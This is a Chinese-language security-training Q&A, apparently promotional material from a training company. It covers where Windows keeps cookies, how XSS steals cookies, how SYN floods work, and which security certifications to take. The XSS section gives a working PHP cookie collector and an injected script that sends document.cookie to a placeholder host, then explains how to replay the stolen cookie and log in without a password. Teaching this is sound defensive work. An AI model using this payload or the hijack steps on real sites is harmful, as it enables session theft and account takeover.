1.cookie 存在哪里?可以打開嗎?
C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies
工具--文件夾選項--查看--將隱藏被保護(hù)的文件的對勾去掉就會看到 cookies 文件夾。
2.xss 如何盜取 cookie?
攻擊者代碼:
<?php
$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie."
referer:".$referer.""); 注意雙引號,容易出錯
fclose($cookietxt);
?>
腳本端:
<script>
document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0
border=0 />');
</script>
獲取到 cookie 后,用 firebug 找到 cookie,新建 cookie
加入 cookie,用 referer 來提交,無需輸入帳號密碼直接登錄進(jìn)去!
3、SYN 攻擊原理
SYN 攻擊屬于 DOS 攻擊的一種,它利用 TCP 協(xié)議缺陷,通過發(fā)送大量的半連接請求,耗費(fèi) CPU 和內(nèi)存資源。
SYN 攻擊除了能影響主機(jī)外,還可以危害路由器、防火墻等網(wǎng)絡(luò)系統(tǒng),事實上SYN 攻擊并不管目標(biāo)是什么系統(tǒng),只要這些系統(tǒng)打開 TCP 服務(wù)就可以實施。從上圖可看到,服務(wù)器接收到連接請求(syn=j),將此信息加入未連接隊列,并發(fā)送請求包給客戶(syn=k,ack=j+1),此時進(jìn)入SYN_RECV 狀態(tài)。
當(dāng)服務(wù)器未收到客戶端的確認(rèn)包時,重發(fā)請求包,一直到超時,才將此條目從未連接隊列刪除。
配合 IP 欺騙,SYN 攻擊能達(dá)到很好的效果,通常,客戶端在短時間內(nèi)偽造大量不存在的 IP 地址,向服務(wù)器不斷地發(fā)送 syn 包,服務(wù)器回復(fù)確認(rèn)包,并等待客戶的確認(rèn),由于源地址是不存在的,服務(wù)器需要不斷的重發(fā)直至超時,這些偽造的 SYN 包將長時間占用未連接隊列,正常的 SYN 請求被丟棄,目標(biāo)系統(tǒng)運(yùn)行緩慢,嚴(yán)重者引起網(wǎng)絡(luò)堵塞甚至系統(tǒng)癱瘓。
4.證書要考哪些?
信息安全國際第一認(rèn)證——CISSP
信息安全國內(nèi)認(rèn)證——CISAW
信息安全國內(nèi)認(rèn)證——CISP
信息安全技術(shù)實操認(rèn)證新貴——Security+
IT 審計人員的必備之證——CISA
更多關(guān)于網(wǎng)絡(luò)安全培訓(xùn)的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓(xùn)服務(wù)經(jīng)驗,采用全程面授高品質(zhì)、高體驗培養(yǎng)模式,擁有國內(nèi)一體化教學(xué)管理及學(xué)員服務(wù),助力更多學(xué)員實現(xiàn)高薪夢想。